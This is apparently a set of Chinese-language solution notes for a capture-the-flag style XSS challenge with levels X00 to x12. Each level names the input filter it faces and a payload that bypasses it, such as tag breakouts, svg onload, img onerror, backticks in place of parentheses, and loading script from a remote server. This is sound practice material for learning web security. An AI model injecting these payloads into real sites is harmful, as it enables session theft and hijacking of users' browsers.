X00
<script>alert(1)</script>

X01
</textarea><script>alert(1)</script><textarea>

X02
"><script>alert(1)</script><"

X03

将()替换成空字符
<script>alert`1`</script>
使用反引号

X04

()和反引号都过滤
<svg><script>alert(1)</script> 进行html编码 <svg><script>alert(1)</script>

X05

-->替换成了笑脸
--!><script>alert(1)</script><--

X06

匹配auto和on开头加=的数据,>符号,替换为_
在等号前换行
onmousedown
=alert(1)

X07

过滤以<开头 以>结尾的字符串
<img src=1 onerror="alert(1)"

X08
</style ><script>alert(1)</script><style>

X09
https://www.segmentfault.com

https://www.segmentfault.com"></script><script>alert(1)//

X0A
https://www.segmentfault.com@xss.haozi.me/j.js
https://www.segmentfault.com@vps地址/xss.js

X0B

将输⼊的字符串转换成⼤写
<svg onload=alert(1)>
html编码
<svg onload=alert(1)>

X0c
<svg onload=alert(1)>

X0d

//只能注释单行,利⽤换⾏逃逸注释,利⽤html的"-->"注释掉后⾯字符
换行
alert(1)
-->

X0e

未解决出来
X0f


');alert(1)//

X10
alert(1)

X11

");alert(1)//

x12

将双引号进行了转义
");alert(1)//
